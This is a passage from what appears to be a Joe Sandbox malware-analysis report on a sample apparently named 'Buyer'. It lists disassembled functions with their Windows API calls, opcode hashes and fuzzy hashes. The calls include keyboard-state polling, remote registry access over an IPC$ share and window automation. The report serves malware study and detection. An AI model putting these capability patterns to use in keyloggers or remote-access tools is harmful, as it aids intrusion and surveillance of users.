                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                    • Opcode ID: 2df11894ed8cc9396dd5f69a17b5f14e90c4d4c2e7fbbbc72a612483deff7f30
                                                                                                    • Instruction ID: 98729fa3cc022e91733037613a438fed8eb569b80dd43a2395f3c74f0fe23869
                                                                                                    • Opcode Fuzzy Hash: 2df11894ed8cc9396dd5f69a17b5f14e90c4d4c2e7fbbbc72a612483deff7f30
                                                                                                    • Instruction Fuzzy Hash: 9431A072D0212ABBD720CB60DC89EFFBB7CEF41754F00406AA905E2104D7349A45AAA0
                                                                                                    Function 00FAECF1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • timeGetTime.WINMM ref: 00FAECF5
                                                                                                      • Part of subcall function 00F5EF0E: timeGetTime.WINMM(?,?,00FAED15), ref: 00F5EF12
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00FAED22
                                                                                                    • EnumThreadWindows.USER32(?,Function_0006ECA6,00000000), ref: 00FAED46
                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FAED68
                                                                                                    • SetActiveWindow.USER32 ref: 00FAED87
                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FAED95
                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FAEDB4
                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00FAEDBF
                                                                                                    • IsWindow.USER32 ref: 00FAEDCB
                                                                                                    • EndDialog.USER32(00000000), ref: 00FAEDDC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                    • String ID: BUTTON
                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                    • Opcode ID: 80484c3ec1eab023e6086591ea3f52b6eb48e92291a5e0f58e9c2a10cfdc27e7
                                                                                                    • Instruction ID: 19af0f5e2066fe1601904f4108e9f15167619f1752d3425e5dadcc2ba47d764e
                                                                                                    • Opcode Fuzzy Hash: 80484c3ec1eab023e6086591ea3f52b6eb48e92291a5e0f58e9c2a10cfdc27e7
                                                                                                    • Instruction Fuzzy Hash: 1A21B4B0211249BFE7215F34EC8CB253B6AFB4A765F148415F48686261CB7E9C44FB60
                                                                                                    Function 00FAF03D Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FAF09E
                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FAF0B4
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FAF0C5
                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FAF0D7
                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FAF0E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SendString$_wcslen
                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                    • Opcode ID: f06d1cd559f3c86ac532b7439fcc98bd0e2af0b97bac0019819a2b8c9532a512
                                                                                                    • Instruction ID: e2a8a556e3868b39931a9362449be200c42440cd0b2ee704a3adcdb8032b923e
                                                                                                    • Opcode Fuzzy Hash: f06d1cd559f3c86ac532b7439fcc98bd0e2af0b97bac0019819a2b8c9532a512
                                                                                                    • Instruction Fuzzy Hash: 1E110A71A9012979E721B7A6CC49EFF7F7CEBD2B10F400429B941A60C1DEA42D09D6B1
                                                                                                    Function 00FAA692 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?), ref: 00FAA713
                                                                                                    • SetKeyboardState.USER32(?), ref: 00FAA77E
                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00FAA79E
                                                                                                    • GetKeyState.USER32(000000A0), ref: 00FAA7B5
                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00FAA7E4
                                                                                                    • GetKeyState.USER32(000000A1), ref: 00FAA7F5
                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00FAA821
                                                                                                    • GetKeyState.USER32(00000011), ref: 00FAA82F
                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00FAA858
                                                                                                    • GetKeyState.USER32(00000012), ref: 00FAA866
                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00FAA88F
                                                                                                    • GetKeyState.USER32(0000005B), ref: 00FAA89D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State$Async$Keyboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 541375521-0
                                                                                                    • Opcode ID: 3a1cce80ec2d64e9cff5f65bbef97d712906876ed52d2417e44d0f2c4627e05e
                                                                                                    • Instruction ID: b1d4753563e1e3c7b7bbc054cf2829ac63e273fe34c198b95a6279498c5adef7
                                                                                                    • Opcode Fuzzy Hash: 3a1cce80ec2d64e9cff5f65bbef97d712906876ed52d2417e44d0f2c4627e05e
                                                                                                    • Instruction Fuzzy Hash: D351A6A0D0478829FB35DB7088557AABFF49F03390F08459AD5C25A2C3DB589A4CEB62
                                                                                                    Function 00FA63BF Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00FA63DB
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FA63F4
                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00FA6452
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00FA6462
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FA6474
                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00FA64C8
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00FA64D6
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FA64E8
                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00FA652A
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00FA653D
                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FA6553
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00FA6560
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                    • String ID:
                                                                                                    • API String ID: 3096461208-0
                                                                                                    • Opcode ID: 22735312447e3872c8d258650708f3198c4c6bfade2140c2224e5a8bab1932ec
                                                                                                    • Instruction ID: 4d763996f226d29e4559b15d724865d1156af972d233b3e2d07082b826e9d73d
                                                                                                    • Opcode Fuzzy Hash: 22735312447e3872c8d258650708f3198c4c6bfade2140c2224e5a8bab1932ec
                                                                                                    • Instruction Fuzzy Hash: 33510FB1F01209AFDB18CF68DD85AAEBBBAFB49314F148129F919E7294D7709D00DB50
                                                                                                    Function 00F58EF2 Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59287: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F58F0D,?,00000000,?,?,?,?,00F58EDF,00000000,?), ref: 00F592EA
                                                                                                    • DestroyWindow.USER32(?), ref: 00F58FA6
                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00F58EDF,00000000,?), ref: 00F59040
                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00F97019
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F58EDF,00000000,?), ref: 00F97047
                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F58EDF,00000000,?), ref: 00F9705E
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F58EDF,00000000), ref: 00F9707A
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00F9708C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 641708696-0
                                                                                                    • Opcode ID: c8375a683c8bfd68f972fb0924e9154e42423345bdddfddeb75d2f3e11cfd375
                                                                                                    • Instruction ID: d1ad8b546641ea20508cb5b559b9f7d8b8f49b67f5292beaeb402cb7ee521a08
                                                                                                    • Opcode Fuzzy Hash: c8375a683c8bfd68f972fb0924e9154e42423345bdddfddeb75d2f3e11cfd375
                                                                                                    • Instruction Fuzzy Hash: 1161E231919700DFDB35EF28D948B2977F3FB44362F200519E982969A4C779A886FF40
                                                                                                    Function 00F59A68 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59B74: GetWindowLongW.USER32(?,000000EB), ref: 00F59B82
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00F59A92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorLongWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 259745315-0
                                                                                                    • Opcode ID: e651ecd74333c40de6fb771ccc1a3da745ad1c9041f5be55d860cbb84242aade
                                                                                                    • Instruction ID: 0b45d2906a24666fba33278e0527bc9e0ccc61d043b30e224bc07f4e0d807fb3
                                                                                                    • Opcode Fuzzy Hash: e651ecd74333c40de6fb771ccc1a3da745ad1c9041f5be55d860cbb84242aade
                                                                                                    • Instruction Fuzzy Hash: 7B41A331549344EFEB249F389C88BB937A6EB81332F144205FAA2871E5C7B58D45FB20
                                                                                                    Function 00FA0D65 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FA0E29
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FA0E45
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FA0E61
                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FA0E8B
                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00FA0EB3
                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FA0EBE
                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FA0EC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                    • API String ID: 323675364-22481851
                                                                                                    • Opcode ID: 48b29b92316d3d05c6410dcfc19a6a14f6a3ae3423ef50572ebca28da7868d41
                                                                                                    • Instruction ID: 2a49e7c6f5d4df55ae2d71f6c490c587d7aac7cae208a5cf42d95990e1f51604
                                                                                                    • Opcode Fuzzy Hash: 48b29b92316d3d05c6410dcfc19a6a14f6a3ae3423ef50572ebca28da7868d41
                                                                                                    • Instruction Fuzzy Hash: F741F972C5022DABDB11EBA4DC859EEBB79BF14710F00452AF905A7261EB359E04EB90
                                                                                                    Function 00FD4756 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00FD47FB
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00FD4802
                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00FD4815
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00FD481D
                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FD4828
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00FD4832
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00FD483C
                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00FD4852
                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00FD485E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                    • String ID: static
                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                    • Opcode ID: bb0ec5da017c07bfbfeb115314468f229ceeb8f4a5f46442a00f48b4fcaee661
                                                                                                    • Instruction ID: 845bcceb8d0440016cde22062b709d77d5e1febde0227cd336e5adeb00c76774
                                                                                                    • Opcode Fuzzy Hash: bb0ec5da017c07bfbfeb115314468f229ceeb8f4a5f46442a00f48b4fcaee661
                                                                                                    • Instruction Fuzzy Hash: 8E316F32501219ABDF129FB4DC08FDA3BAAFF09764F150212FA25E62A0C735D851FB94
                                                                                                    Function 00FC43B7 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FC43E3
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00FC4411
                                                                                                    • CoUninitialize.OLE32 ref: 00FC441B
                                                                                                    • _wcslen.LIBCMT ref: 00FC44B4
                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00FC4538
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FC465C
                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00FC4695
                                                                                                    • CoGetObject.OLE32(?,00000000,00FE0B80,?), ref: 00FC46B4
                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00FC46C7
                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FC474B
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FC475F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 429561992-0
                                                                                                    • Opcode ID: 7615c9bd4a4db34d09cda020a083de9dcf58e87d6f194028b6784d0ac2a7f40d
                                                                                                    • Instruction ID: 374cafe8e2cc477a6cc58176c34bebd1b2b0db28fe6c8a04b97f5f5ae0ec58bb
                                                                                                    • Opcode Fuzzy Hash: 7615c9bd4a4db34d09cda020a083de9dcf58e87d6f194028b6784d0ac2a7f40d
                                                                                                    • Instruction Fuzzy Hash: 03C14671A04302AFC700DF24C991E2ABBE9FF89758F14491DF9998B251D730ED05EB52
                                                                                                    Function 00FB8205 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00FB8262
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FB82FE
                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00FB8312
                                                                                                    • CoCreateInstance.OLE32(00FE0CF0,00000000,00000001,01007E7C,?), ref: 00FB835E
                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FB83E3
                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00FB843B
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00FB84C6
                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FB84E9
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00FB84F0
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00FB8545
                                                                                                    • CoUninitialize.OLE32 ref: 00FB854B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2762341140-0
                                                                                                    • Opcode ID: eeba1df552ea0dd6de008fc28ca416e677aa0b89654db26f77f35c9ccc8454be
                                                                                                    • Instruction ID: 3a2eaa94d721d0329c845ad0bd20f8806377a0aab4ea27e45ae4d26d6c0d1028
                                                                                                    • Opcode Fuzzy Hash: eeba1df552ea0dd6de008fc28ca416e677aa0b89654db26f77f35c9ccc8454be
                                                                                                    • Instruction Fuzzy Hash: 79C11A75A00109EFCB14DFA5C884DAEBBF9FF48354B148499E8169B261CB34EE46DF90
                                                                                                    Function 00FD5BDD Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00FD5CC4
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FD5CD5
                                                                                                    • CharNextW.USER32(00000158), ref: 00FD5D04
                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00FD5D45
                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00FD5D5B
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FD5D6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CharNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 1350042424-0
                                                                                                    • Opcode ID: 23c1711f1ea9d94b12dfaa155f438f0b4627887b1072aa425b6c5d7df2fd0685
                                                                                                    • Instruction ID: 4dbf90f588062c978aad0899ea8db41c3ef2483002a6660dbe4533053e7d86eb
                                                                                                    • Opcode Fuzzy Hash: 23c1711f1ea9d94b12dfaa155f438f0b4627887b1072aa425b6c5d7df2fd0685
                                                                                                    • Instruction Fuzzy Hash: 44618031901209ABDF219FA4CC84AFE7BBAEF05B60F184147F925AB391C7749941FB60
                                                                                                    Function 00FA010F Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FA0136
                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00FA018F
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FA01A1
                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FA01C1
                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00FA0214
                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FA0228
